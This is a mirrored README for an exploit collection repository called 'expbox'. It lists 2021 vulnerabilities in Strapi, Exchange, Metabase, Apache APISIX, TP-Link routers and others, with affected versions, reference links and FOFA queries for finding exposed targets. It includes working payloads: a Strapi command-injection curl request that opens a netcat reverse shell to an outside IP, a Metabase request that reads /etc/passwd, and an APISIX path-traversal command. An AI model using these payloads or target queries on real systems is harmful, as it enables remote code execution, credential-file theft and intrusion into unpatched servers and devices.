Code Monkey home page Code Monkey logo

expbox's Introduction

[object Object]

Introduction

expbox is an exploit code collection repository

List

Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution

curl -i -s -k -X $'POST' -H $'Host: api-prod.horizontall.htb' -H $'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMzE5NzEwLCJleHAiOjE2MzI5MTE3MTB9.AfJr81dyxnmzlutCKArmf0kBgFCcDDhsk91IYNDpTFM' -H $'Content-Type: application/json' -H $'Origin: http://api-prod.horizontall.htb' -H $'Content-Length: 123' -H $'Connection: close' --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.42 4444 >/tmp/f)\",\"port\":\"80\"}' $'http://api-prod.horizontall.htb/admin/plugins/install'

CVE-2021-41349 Exchange XSS PoC

<= Exchange 2013 update 23
<= Exchange 2016 update 22
<= Exchange 2019 update 11

CVE-2021โ€“3945 Django-helpdesk stored XSS PoC

<= 0.3.0

CVE-2021-37580 Apache ShenYu 2.3.0/2.4.0 authentication bypass

Ref: https://github.com/fengwenhua/CVE-2021-37580

Hadoop Yarn RPC RCE

Ref: https://github.com/cckuailong/YarnRpcRCE

CVE-2021-41277 MetaBase Arbitrary File Read

MetaBase < 0.40.5
1.0.0 <= MetaBase < 1.40.5

FOFA:

app="Metabase"

PoC:

GET /api/geojson?url=file:/etc/passwd HTTP/1.1

CVE-2021-42321 Exchange Post-Auth RCE

<= Exchange 2016 update 22
<= Exchange 2019 update 11

Windows 0day - InstallerFileTakeOver image

Ref:https://github.com/klinix5/InstallerFileTakeOver

CVE-2021-43557 Apache APISIX: Path traversal in request_uri variable

#/bin/bash

kubectl exec -it -n ingress-apisix apisix-dc9d99d76-vl5lh -- curl --path-as-is http://127.0.0.1:9080$1 -H 'Host: app.test'

CVE-2021-43267 Linux Kernel TIPC RCE

5.10-rc1 < Linux kernel < 5.15

Reference: https://haxx.in/posts/pwning-tipc/

Nginx 0.7.0 to 1.17.9 Host injection

Ref: https://twitter.com/infosec_90/status/1464337963240861702

CVE-2021-32849 Gerapy clone background remote command execution

Gerapy <= 0.9.6

CVE-2021-41653 TP-Link TL-WR840N remote command execution

TL-WR840N(EU)_V5_171211 / 0.9.1 3.16 v0001.0 Build 171211 Rel.58800n

Fofa:

app="TP_LINK-TL-WR840N"

Ref: https://github.com/ohnonoyesyes/CVE-2021-41653

Note

All content comes from the Internet, if there is a copyright problem, please contact me to delete.

expbox's People

Contributors

cckuailong avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.